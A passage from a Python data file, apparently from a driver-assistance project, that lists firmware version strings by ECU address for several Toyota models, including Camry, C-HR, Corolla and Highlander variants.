b'\x018966333P4900\x00\x00\x00\x00',
b'\x018966333Q6000\x00\x00\x00\x00',
b'\x018966333Q6200\x00\x00\x00\x00',
b'\x018966333Q6300\x00\x00\x00\x00',
b'\x018966333W6000\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x02333P1100\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'8821F0601200 ',
b'8821F0601300 ',
b'8821F0602000 ',
b'8821F0603300 ',
b'8821F0604100 ',
b'8821F0605200 ',
b'8821F0607200 ',
b'8821F0608000 ',
b'8821F0608200 ',
b'8821F0609100 ',
],
(Ecu.esp, 0x7b0, None): [
b'F152606210\x00\x00\x00\x00\x00\x00',
b'F152606230\x00\x00\x00\x00\x00\x00',
b'F152606270\x00\x00\x00\x00\x00\x00',
b'F152606290\x00\x00\x00\x00\x00\x00',
b'F152606410\x00\x00\x00\x00\x00\x00',
b'F152633540\x00\x00\x00\x00\x00\x00',
b'F152633A10\x00\x00\x00\x00\x00\x00',
b'F152633A20\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33540\x00\x00\x00\x00\x00\x00',
b'8965B33542\x00\x00\x00\x00\x00\x00',
b'8965B33580\x00\x00\x00\x00\x00\x00',
b'8965B33581\x00\x00\x00\x00\x00\x00',
b'8965B33621\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [ # Same as 0x791
b'8821F0601200 ',
b'8821F0601300 ',
b'8821F0602000 ',
b'8821F0603300 ',
b'8821F0604100 ',
b'8821F0605200 ',
b'8821F0607200 ',
b'8821F0608000 ',
b'8821F0608200 ',
b'8821F0609100 ',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0601200 ',
b'8646F0601300 ',
b'8646F0601400 ',
b'8646F0603400 ',
b'8646F0604100 ',
b'8646F0605000 ',
b'8646F0606000 ',
b'8646F0606100 ',
b'8646F0607100 ',
],
},
CAR.CAMRYH: {
(Ecu.engine, 0x700, None): [
b'\x018966306Q6000\x00\x00\x00\x00',
b'\x018966333N1100\x00\x00\x00\x00',
b'\x018966333N4300\x00\x00\x00\x00',
b'\x018966333X0000\x00\x00\x00\x00',
b'\x018966333X4000\x00\x00\x00\x00',
b'\x01896633T16000\x00\x00\x00\x00',
b'\x028966306B2100\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306B2300\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306B2500\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306N8100\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306N8200\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306N8300\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306N8400\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306R5000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306R5000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966306R6000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966306R6000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966306S0000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966306S0100\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966306S1100\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152633214\x00\x00\x00\x00\x00\x00',
b'F152633660\x00\x00\x00\x00\x00\x00',
b'F152633712\x00\x00\x00\x00\x00\x00',
b'F152633713\x00\x00\x00\x00\x00\x00',
b'F152633B51\x00\x00\x00\x00\x00\x00',
b'F152633B60\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'8821F0601200 ',
b'8821F0601300 ',
b'8821F0603400 ',
b'8821F0604000 ',
b'8821F0604100 ',
b'8821F0604200 ',
b'8821F0605200 ',
b'8821F0606200 ',
b'8821F0607200 ',
b'8821F0608000 ',
b'8821F0608200 ',
b'8821F0609000 ',
b'8821F0609100 ',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33540\x00\x00\x00\x00\x00\x00',
b'8965B33542\x00\x00\x00\x00\x00\x00',
b'8965B33550\x00\x00\x00\x00\x00\x00',
b'8965B33551\x00\x00\x00\x00\x00\x00',
b'8965B33580\x00\x00\x00\x00\x00\x00',
b'8965B33581\x00\x00\x00\x00\x00\x00',
b'8965B33611\x00\x00\x00\x00\x00\x00',
b'8965B33621\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [ # Same as 0x791
b'8821F0601200 ',
b'8821F0601300 ',
b'8821F0603400 ',
b'8821F0604000 ',
b'8821F0604100 ',
b'8821F0604200 ',
b'8821F0605200 ',
b'8821F0606200 ',
b'8821F0607200 ',
b'8821F0608000 ',
b'8821F0608200 ',
b'8821F0609000 ',
b'8821F0609100 ',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0601200 ',
b'8646F0601300 ',
b'8646F0601400 ',
b'8646F0603400 ',
b'8646F0603500 ',
b'8646F0604100 ',
b'8646F0605000 ',
b'8646F0606000 ',
b'8646F0606100 ',
b'8646F0607000 ',
b'8646F0607100 ',
],
},
CAR.CAMRY_TSS2: {
(Ecu.eps, 0x7a1, None): [
b'8965B33630\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152606370\x00\x00\x00\x00\x00\x00',
b'\x01F152606390\x00\x00\x00\x00\x00\x00',
b'\x01F152606400\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x018966306Q5000\x00\x00\x00\x00',
b'\x018966306T3100\x00\x00\x00\x00',
b'\x018966306T3200\x00\x00\x00\x00',
b'\x018966306T4000\x00\x00\x00\x00',
b'\x018966306T4100\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F0602100\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
b'\x028646F0602200\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
b'\x028646F3305200\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
b'\x028646F3305300\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.CAMRYH_TSS2: {
(Ecu.eps, 0x7a1, None): [
b'8965B33630\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152633D00\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x018966306Q6000\x00\x00\x00\x00',
b'\x018966306Q7000\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 15): [
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 109): [
b'\x028646F3305200\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
b'\x028646F3305300\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.CHR: {
(Ecu.engine, 0x700, None): [
b'\x01896631021100\x00\x00\x00\x00',
b'\x01896631017100\x00\x00\x00\x00',
b'\x01896631017200\x00\x00\x00\x00',
b'\x0189663F413100\x00\x00\x00\x00',
b'\x0189663F414100\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'8821F0W01000 ',
b'8821F0W01100 ',
b'8821FF401600 ',
b'8821FF404000 ',
b'8821FF404100 ',
b'8821FF405100 ',
b'8821FF406000 ',
b'8821FF407100 ',
],
(Ecu.esp, 0x7b0, None): [
b'F152610020\x00\x00\x00\x00\x00\x00',
b'F152610153\x00\x00\x00\x00\x00\x00',
b'F152610210\x00\x00\x00\x00\x00\x00',
b'F1526F4034\x00\x00\x00\x00\x00\x00',
b'F1526F4044\x00\x00\x00\x00\x00\x00',
b'F1526F4073\x00\x00\x00\x00\x00\x00',
b'F1526F4121\x00\x00\x00\x00\x00\x00',
b'F1526F4122\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B10011\x00\x00\x00\x00\x00\x00',
b'8965B10040\x00\x00\x00\x00\x00\x00',
b'8965B10070\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0331024000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
b'\x0331024000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203302\x00\x00\x00\x00',
b'\x0331036000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203302\x00\x00\x00\x00',
b'\x033F401100\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203102\x00\x00\x00\x00',
b'\x033F401200\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
b'\x033F424000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F0W01000 ',
b'8821FF401600 ',
b'8821FF404000 ',
b'8821FF404100 ',
b'8821FF405100 ',
b'8821FF406000 ',
b'8821FF407100 ',
b'8821F0W01100 ',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646FF401700 ',
b'8646FF401800 ',
b'8646FF404000 ',
b'8646FF406000 ',
b'8646FF407000 ',
],
},
CAR.CHRH: {
(Ecu.engine, 0x700, None): [
b'\x0289663F405100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896631013200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0289663F405000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0289663F418000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0289663F423000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0289663F431000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x0189663F438000\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152610012\x00\x00\x00\x00\x00\x00',
b'F152610013\x00\x00\x00\x00\x00\x00',
b'F152610014\x00\x00\x00\x00\x00\x00',
b'F152610040\x00\x00\x00\x00\x00\x00',
b'F152610190\x00\x00\x00\x00\x00\x00',
b'F152610200\x00\x00\x00\x00\x00\x00',
b'F152610230\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'8821F0W01000 ',
b'8821FF402300 ',
b'8821FF402400 ',
b'8821FF404000 ',
b'8821FF404100 ',
b'8821FF405000 ',
b'8821FF406000 ',
b'8821FF407100 ',
],
(Ecu.eps, 0x7a1, None): [
b'8965B10011\x00\x00\x00\x00\x00\x00',
b'8965B10020\x00\x00\x00\x00\x00\x00',
b'8965B10040\x00\x00\x00\x00\x00\x00',
b'8965B10050\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F0W01000 ',
b'8821FF402300 ',
b'8821FF402400 ',
b'8821FF404000 ',
b'8821FF404100 ',
b'8821FF405000 ',
b'8821FF406000 ',
b'8821FF407100 ',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646FF401700 ',
b'8646FF402100 ',
b'8646FF404000 ',
b'8646FF406000 ',
b'8646FF407000 ',
],
},
CAR.COROLLA: {
(Ecu.engine, 0x7e0, None): [
b'\x0230ZC2000\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC2100\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC2200\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC2300\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC3000\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC3100\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC3200\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZC3300\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0330ZC1200\x00\x00\x00\x00\x00\x00\x00\x0050212000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510201100\x00\x00\x00\x00',
b'881510201200\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152602190\x00\x00\x00\x00\x00\x00',
b'F152602191\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B02181\x00\x00\x00\x00\x00\x00',
b'8965B02191\x00\x00\x00\x00\x00\x00',
b'8965B48150\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0201101\x00\x00\x00\x00',
b'8646F0201200\x00\x00\x00\x00',
],
},
CAR.COROLLA_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630ZG2000\x00\x00\x00\x00',
b'\x01896630ZG5000\x00\x00\x00\x00',
b'\x01896630ZG5100\x00\x00\x00\x00',
b'\x01896630ZG5200\x00\x00\x00\x00',
b'\x01896630ZG5300\x00\x00\x00\x00',
b'\x01896630ZP1000\x00\x00\x00\x00',
b'\x01896630ZP2000\x00\x00\x00\x00',
b'\x01896630ZQ5000\x00\x00\x00\x00',
b'\x018966312L8000\x00\x00\x00\x00',
b'\x018966312M0000\x00\x00\x00\x00',
b'\x018966312M9000\x00\x00\x00\x00',
b'\x018966312P9000\x00\x00\x00\x00',
b'\x018966312P9100\x00\x00\x00\x00',
b'\x018966312P9200\x00\x00\x00\x00',
b'\x018966312P9300\x00\x00\x00\x00',
b'\x018966312Q2300\x00\x00\x00\x00',
b'\x018966312Q8000\x00\x00\x00\x00',
b'\x018966312R0000\x00\x00\x00\x00',
b'\x018966312R0100\x00\x00\x00\x00',
b'\x018966312R1000\x00\x00\x00\x00',
b'\x018966312R1100\x00\x00\x00\x00',
b'\x018966312R3100\x00\x00\x00\x00',
b'\x018966312S5000\x00\x00\x00\x00',
b'\x018966312S7000\x00\x00\x00\x00',
b'\x018966312W3000\x00\x00\x00\x00',
b'\x018966312W9000\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0230A10000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230A11000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230ZN4000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x03312K7000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203402\x00\x00\x00\x00',
b'\x03312M3000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203402\x00\x00\x00\x00',
b'\x03312N6000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203202\x00\x00\x00\x00',
b'\x03312N6000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203302\x00\x00\x00\x00',
b'\x03312N6000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203402\x00\x00\x00\x00',
b'\x03312N6100\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203302\x00\x00\x00\x00',
b'\x03312N6100\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00895231203402\x00\x00\x00\x00',
b'\x02312K4000\x00\x00\x00\x00\x00\x00\x00\x00A0202000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'\x018965B12350\x00\x00\x00\x00\x00\x00',
b'\x018965B12470\x00\x00\x00\x00\x00\x00',
b'\x018965B12490\x00\x00\x00\x00\x00\x00',
b'\x018965B12500\x00\x00\x00\x00\x00\x00',
b'\x018965B12520\x00\x00\x00\x00\x00\x00',
b'\x018965B12530\x00\x00\x00\x00\x00\x00',
b'\x018965B1255000\x00\x00\x00\x00',
b'8965B12361\x00\x00\x00\x00\x00\x00',
b'8965B16011\x00\x00\x00\x00\x00\x00',
b'\x018965B12510\x00\x00\x00\x00\x00\x00'
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152602280\x00\x00\x00\x00\x00\x00',
b'\x01F152602560\x00\x00\x00\x00\x00\x00',
b'\x01F152602590\x00\x00\x00\x00\x00\x00',
b'\x01F152602650\x00\x00\x00\x00\x00\x00',
b"\x01F15260A010\x00\x00\x00\x00\x00\x00",
b'\x01F15260A050\x00\x00\x00\x00\x00\x00',
b'\x01F152612641\x00\x00\x00\x00\x00\x00',
b'\x01F152612651\x00\x00\x00\x00\x00\x00',
b'\x01F152612B10\x00\x00\x00\x00\x00\x00',
b'\x01F152612B51\x00\x00\x00\x00\x00\x00',
b'\x01F152612B60\x00\x00\x00\x00\x00\x00',
b'\x01F152612B61\x00\x00\x00\x00\x00\x00',
b'\x01F152612B62\x00\x00\x00\x00\x00\x00',
b'\x01F152612B71\x00\x00\x00\x00\x00\x00',
b'\x01F152612B81\x00\x00\x00\x00\x00\x00',
b'\x01F152612B90\x00\x00\x00\x00\x00\x00',
b'\x01F152612C00\x00\x00\x00\x00\x00\x00',
b'F152602191\x00\x00\x00\x00\x00\x00',
b'\x01F152612862\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F12010D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201100\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201300\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F1201400\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b'\x028646F1202000\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F1202100\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F1202200\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b'\x028646F1601100\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
CAR.COROLLAH_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630ZJ1000\x00\x00\x00\x00',
b'\x01896630ZU8000\x00\x00\x00\x00',
b'\x01896637621000\x00\x00\x00\x00',
b'\x01896637624000\x00\x00\x00\x00',
b'\x01896637626000\x00\x00\x00\x00',
b'\x01896637648000\x00\x00\x00\x00',
b'\x01896637643000\x00\x00\x00\x00',
b'\x02896630ZJ5000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZN8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZQ3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZR2000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZT8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896630ZT9000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966312K6000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966312L0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966312Q3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966312Q4000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x038966312L7000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF1205001\x00\x00\x00\x00',
b'\x038966312N1000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF1203001\x00\x00\x00\x00',
b'\x038966312T3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF1205001\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B12361\x00\x00\x00\x00\x00\x00',
b'8965B12451\x00\x00\x00\x00\x00\x00',
b'8965B76012\x00\x00\x00\x00\x00\x00',
b'8965B76050\x00\x00\x00\x00\x00\x00',
b'\x018965B12350\x00\x00\x00\x00\x00\x00',
b'\x018965B12470\x00\x00\x00\x00\x00\x00',
b'\x018965B12490\x00\x00\x00\x00\x00\x00',
b'\x018965B12500\x00\x00\x00\x00\x00\x00',
b'\x018965B12510\x00\x00\x00\x00\x00\x00',
b'\x018965B12520\x00\x00\x00\x00\x00\x00',
b'\x018965B12530\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152612590\x00\x00\x00\x00\x00\x00',
b'F152612691\x00\x00\x00\x00\x00\x00',
b'F152612692\x00\x00\x00\x00\x00\x00',
b'F152612700\x00\x00\x00\x00\x00\x00',
b'F152612710\x00\x00\x00\x00\x00\x00',
b'F152612790\x00\x00\x00\x00\x00\x00',
b'F152612800\x00\x00\x00\x00\x00\x00',
b'F152612820\x00\x00\x00\x00\x00\x00',
b'F152612840\x00\x00\x00\x00\x00\x00',
b'F152612890\x00\x00\x00\x00\x00\x00',
b'F152612A00\x00\x00\x00\x00\x00\x00',
b'F152612A10\x00\x00\x00\x00\x00\x00',
b'F152642540\x00\x00\x00\x00\x00\x00',
b'F152676293\x00\x00\x00\x00\x00\x00',
b'F152676303\x00\x00\x00\x00\x00\x00',
b'F152676304\x00\x00\x00\x00\x00\x00',
b'F152612D00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F12010D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201100\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F1201300\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F1201400\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b'\x028646F1202000\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F1202100\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F1202200\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b"\x028646F1601300\x00\x00\x00\x008646G2601400\x00\x00\x00\x00",
b'\x028646F4203400\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F76020C0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F7603100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F7603200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
CAR.HIGHLANDER: {
(Ecu.engine, 0x700, None): [
b'\x01896630E09000\x00\x00\x00\x00',
b'\x01896630E43000\x00\x00\x00\x00',
b'\x01896630E43100\x00\x00\x00\x00',
b'\x01896630E43200\x00\x00\x00\x00',
b'\x01896630E44200\x00\x00\x00\x00',
b'\x01896630E45000\x00\x00\x00\x00',
b'\x01896630E45100\x00\x00\x00\x00',
b'\x01896630E45200\x00\x00\x00\x00',
b'\x01896630E46000\x00\x00\x00\x00',
b'\x01896630E46200\x00\x00\x00\x00',
b'\x01896630E74000\x00\x00\x00\x00',
b'\x01896630E75000\x00\x00\x00\x00',
b'\x01896630E76000\x00\x00\x00\x00',
b'\x01896630E77000\x00\x00\x00\x00',
b'\x01896630E83000\x00\x00\x00\x00',
b'\x01896630E84000\x00\x00\x00\x00',
b'\x01896630E85000\x00\x00\x00\x00',
b'\x01896630E86000\x00\x00\x00\x00',
b'\x01896630E88000\x00\x00\x00\x00',
b'\x01896630EA0000\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B48140\x00\x00\x00\x00\x00\x00',
b'8965B48150\x00\x00\x00\x00\x00\x00',
b'8965B48210\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [b'F15260E011\x00\x00\x00\x00\x00\x00'],
(Ecu.dsu, 0x791, None): [
b'881510E01100\x00\x00\x00\x00',
b'881510E01200\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0E01200\x00\x00\x00\x00',
b'8646F0E01300\x00\x00\x00\x00',
],
},
CAR.HIGHLANDERH: {
(Ecu.eps, 0x7a1, None): [
b'8965B48160\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152648541\x00\x00\x00\x00\x00\x00',
b'F152648542\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0230E40000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230E40100\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230EA2000\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230EA2100\x00\x00\x00\x00\x00\x00\x00\x00A4802000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0E01200\x00\x00\x00\x00',
b'8646F0E01300\x00\x00\x00\x00',
],
},
CAR.HIGHLANDER_TSS2: {
(Ecu.eps, 0x7a1, None): [
b'8965B48241\x00\x00\x00\x00\x00\x00',
b'8965B48310\x00\x00\x00\x00\x00\x00',
b'8965B48320\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F15260E051\x00\x00\x00\x00\x00\x00',
b'\x01F15260E061\x00\x00\x00\x00\x00\x00',
b'\x01F15260E110\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x01896630E62100\x00\x00\x00\x00',
b'\x01896630E62200\x00\x00\x00\x00',
b'\x01896630E64100\x00\x00\x00\x00',
b'\x01896630E64200\x00\x00\x00\x00',
b'\x01896630EB1000\x00\x00\x00\x00',
b'\x01896630EB1100\x00\x00\x00\x00',
b'\x01896630EB1200\x00\x00\x00\x00',
b'\x01896630EB2000\x00\x00\x00\x00',
b'\x01896630EB2100\x00\x00\x00\x00',
b'\x01896630EB2200\x00\x00\x00\x00',
b'\x01896630EC4000\x00\x00\x00\x00',
b'\x01896630ED9000\x00\x00\x00\x00',
b'\x01896630EE1000\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301400\x00\x00\x00\x00',
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F0E02100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4803000\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.HIGHLANDERH_TSS2: {
(Ecu.eps, 0x7a1, None): [
b'8965B48241\x00\x00\x00\x00\x00\x00',
b'8965B48310\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F15264872300\x00\x00\x00\x00',
b'\x01F15264872400\x00\x00\x00\x00',
b'\x01F15264872500\x00\x00\x00\x00',
b'\x01F15264873500\x00\x00\x00\x00',
b'\x01F152648C6300\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x01896630E67000\x00\x00\x00\x00',
b'\x01896630EA1000\x00\x00\x00\x00',
b'\x01896630EE4000\x00\x00\x00\x00',
b'\x01896630EA1000\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896630E66000\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896630EB3000\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896630EB3100\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896630E66100\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301400\x00\x00\x00\x00',
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
